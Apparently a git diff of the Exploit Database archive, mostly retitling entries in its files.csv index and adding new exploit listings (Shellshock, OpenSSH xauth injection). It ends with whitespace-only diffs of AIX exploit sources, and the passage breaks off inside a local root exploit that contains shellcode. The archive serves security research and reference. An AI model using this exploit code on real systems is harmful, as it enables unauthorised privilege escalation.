platforms/windows/remote/8332.txt | 176 +- platforms/windows/remote/8336.pl | 190 +- platforms/windows/remote/8338.py | 190 +- platforms/windows/remote/8339.py | 242 +- platforms/windows/remote/8340.py | 234 +- platforms/windows/remote/8354.py | 220 +- platforms/windows/remote/8363.py | 130 +- platforms/windows/remote/8368.txt | 92 +- platforms/windows/remote/8392.txt | 117 +- platforms/windows/remote/8421.py | 88 +- platforms/windows/remote/8428.txt | 62 +- platforms/windows/remote/847.cpp | 6 +- platforms/windows/remote/8537.txt | 52 +- platforms/windows/remote/854.cpp | 6 +- platforms/windows/remote/8554.py | 140 +- platforms/windows/remote/8560.html | 252 +- platforms/windows/remote/8561.pl | 138 +- 
platforms/windows/remote/8562.html | 122 +- platforms/windows/remote/8564.pl | 250 +- platforms/windows/remote/8579.html | 80 +- platforms/windows/remote/859.c | 6 +- platforms/windows/remote/8613.py | 130 +- platforms/windows/remote/8614.py | 116 +- platforms/windows/remote/8621.py | 138 +- platforms/windows/remote/8623.rb | 234 +- platforms/windows/remote/8651.pl | 134 +- platforms/windows/remote/8716.py | 124 +- platforms/windows/remote/8732.py | 156 +- platforms/windows/remote/8742.txt | 50 +- platforms/windows/remote/875.c | 6 +- platforms/windows/remote/8754.patch | 238 +- platforms/windows/remote/8757.html | 98 +- platforms/windows/remote/8758.html | 96 +- platforms/windows/remote/8765.php | 194 +- platforms/windows/remote/8804.py | 138 +- platforms/windows/remote/8806.pl | 250 +- platforms/windows/remote/8824.html | 60 +- platforms/windows/remote/883.c | 6 +- platforms/windows/remote/8835.html | 90 +- platforms/windows/remote/8897.c | 454 +- platforms/windows/remote/8916.py | 132 +- platforms/windows/remote/8930.txt | 230 +- platforms/windows/remote/8970.txt | 168 +- platforms/windows/remote/8986.txt | 100 +- platforms/windows/remote/9002.c | 498 +- platforms/windows/remote/9031.py | 136 +- platforms/windows/remote/906.c | 6 +- platforms/windows/remote/9065.c | 92 +- platforms/windows/remote/909.cpp | 6 +- platforms/windows/remote/9093.txt | 82 +- platforms/windows/remote/9139.pl | 72 +- platforms/windows/remote/92.c | 6 +- platforms/windows/remote/9224.py | 315 +- platforms/windows/remote/930.html | 6 +- platforms/windows/remote/9303.c | 118 +- platforms/windows/remote/9318.py | 116 +- platforms/windows/remote/9319.py | 102 +- platforms/windows/remote/9330.py | 90 +- platforms/windows/remote/944.c | 6 +- platforms/windows/remote/9443.txt | 128 +- platforms/windows/remote/945.c | 6 +- platforms/windows/remote/9468.py | 124 +- platforms/windows/remote/947.pl | 6 +- platforms/windows/remote/949.c | 6 +- platforms/windows/remote/9500.cpp | 344 +- 
platforms/windows/remote/9508.rb | 130 +- platforms/windows/remote/952.pl | 6 +- platforms/windows/remote/953.c | 6 +- platforms/windows/remote/960.c | 6 +- platforms/windows/remote/9613.py | 278 +- platforms/windows/remote/9615.jar | 446 +- platforms/windows/remote/9643.txt | 62 +- platforms/windows/remote/9649.txt | 146 +- platforms/windows/remote/9652.sh | 178 +- platforms/windows/remote/9660.pl | 76 +- platforms/windows/remote/9663.py | 208 +- platforms/windows/remote/9676.txt | 84 +- platforms/windows/remote/9694.txt | 52 +- platforms/windows/remote/97.c | 6 +- platforms/windows/remote/9704.html | 210 +- platforms/windows/remote/9705.html | 112 +- platforms/windows/remote/976.cpp | 6 +- platforms/windows/remote/979.txt | 6 +- platforms/windows/remote/987.c | 6 +- platforms/windows/remote/990.c | 6 +- 7877 files changed, 590387 insertions(+), 589604 deletions(-) create mode 100755 platforms/freebsd_x86-64/dos/39570.c create mode 100755 platforms/hardware/remote/39568.py create mode 100755 platforms/multiple/remote/39569.py create mode 100755 platforms/perl/webapps/39564.txt create mode 100755 platforms/windows/dos/39565.txt diff --git a/files.csv b/files.csv index 90b4dc0d5..5e03f29d5 100755 --- a/files.csv +++ b/files.csv 
@@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
 3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
-3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
+3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
 3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
@@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
-10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
+10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
 11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
-11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
+11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
 11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
-11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
+11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
 11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
@@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
-12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
+12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
 12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
-12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
+12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
@@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
 12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
-12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
+12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
 12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
-12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
+12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
 12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
-14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
+14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
@@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
-12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
+12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
 12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
-14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
+14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
@@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
-14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
+14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
 14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
 14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
 17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
-17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
+17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
-24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
+24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
-30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
+30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
-34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
+34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
@@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
-35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
+35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
+39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
+39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
+39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
+39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
+39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
diff --git a/platforms/aix/local/1044.c b/platforms/aix/local/1044.c
index b888351ce..9a21e1c0b 100755
--- a/platforms/aix/local/1044.c
+++ b/platforms/aix/local/1044.c
@@ -94,6 +94,6 @@ int main() execve( "/usr/bin/netpmon", args, envs ); return( 0 );
-}
-
-// milw0rm.com [2005-06-14]
+}
+
+// milw0rm.com [2005-06-14]
diff --git a/platforms/aix/local/1045.c b/platforms/aix/local/1045.c
index 0f2d2c991..69e8f81e6 100755
--- a/platforms/aix/local/1045.c
+++ b/platforms/aix/local/1045.c
@@ -95,6 +95,6 @@ int main() execve( "/usr/sbin/ipl_varyon", args, envs ); return( 0 );
-}
-
-// milw0rm.com [2005-06-14]
+}
+
+// milw0rm.com [2005-06-14]
diff --git a/platforms/aix/local/1046.c b/platforms/aix/local/1046.c
index 4daa0c832..b310be688 100755
--- a/platforms/aix/local/1046.c
+++ b/platforms/aix/local/1046.c
@@ -94,6 +94,6 @@ int main() execve( "/usr/bin/paginit", args, envs ); return( 0 );
-}
-
-// milw0rm.com [2005-06-14]
+}
+
+// milw0rm.com [2005-06-14]
diff --git a/platforms/aix/local/333.c b/platforms/aix/local/333.c
index ddd748e3a..10912b946 100755
--- a/platforms/aix/local/333.c
+++ b/platforms/aix/local/333.c
@@ -155,6 +155,6 @@ L=`expr $L + 144` ./a.out $L done /str0ke
- */
-
-// milw0rm.com [1997-05-27]
+ */
+
+// milw0rm.com [1997-05-27]
diff --git a/platforms/aix/local/335.c b/platforms/aix/local/335.c
index 6b653840b..4e76450d8 100755
--- a/platforms/aix/local/335.c
+++ b/platforms/aix/local/335.c
@@ -156,6 +156,6 @@ do echo $L L=`expr $L + 42` ./a.out $L
-done */
-
-// milw0rm.com [1997-05-26]
+done */
+
+// milw0rm.com [1997-05-26]
diff --git a/platforms/aix/local/4231.c b/platforms/aix/local/4231.c
index 17cd1b401..6ce19eb65 100755
--- a/platforms/aix/local/4231.c
+++ b/platforms/aix/local/4231.c
@@ -1,178 +1,178 @@ -/* 07/2007: public release - * IBM AIX <= 5.3 sp6 - * - * AIX capture Local Root Exploit - * By qaaz - */ -#include -#include -#include - -#include -#include -#include -#include - -#define TARGET "/usr/bin/capture" -#define VALCNT 40 - -#define MAX(x,y) ((x) > (y) ? (x) : (y)) -#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) - -unsigned char qaazcode[] = -"\x60\x60\x60\x60\x60\x60\x60\x60" -"\x7c\x63\x1a\x79\x40\x82\xff\xfd" -"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" -"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" -"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" -"\x44\xff\xff\x02\x38\x75\xff\x5f" -"\x38\x63\x01\x01\x88\x95\xff\x5d" -"\x38\x63\x01\x02\x38\x63\xfe\xff" -"\x88\xa3\xfe\xff\x7c\x04\x28\x40" -"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" -"\x98\xa3\xfe\xff\x88\x55\xff\x5c" -"\x38\x75\xff\x5f\x38\x81\xff\xf8" -"\x90\x61\xff\xf8\x90\xa1\xff\xfc" -"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; - -void shell(int p1[2], int p2[2]) -{ - ssize_t n; - fd_set rset; - char buf[4096]; - - for (;;) { - 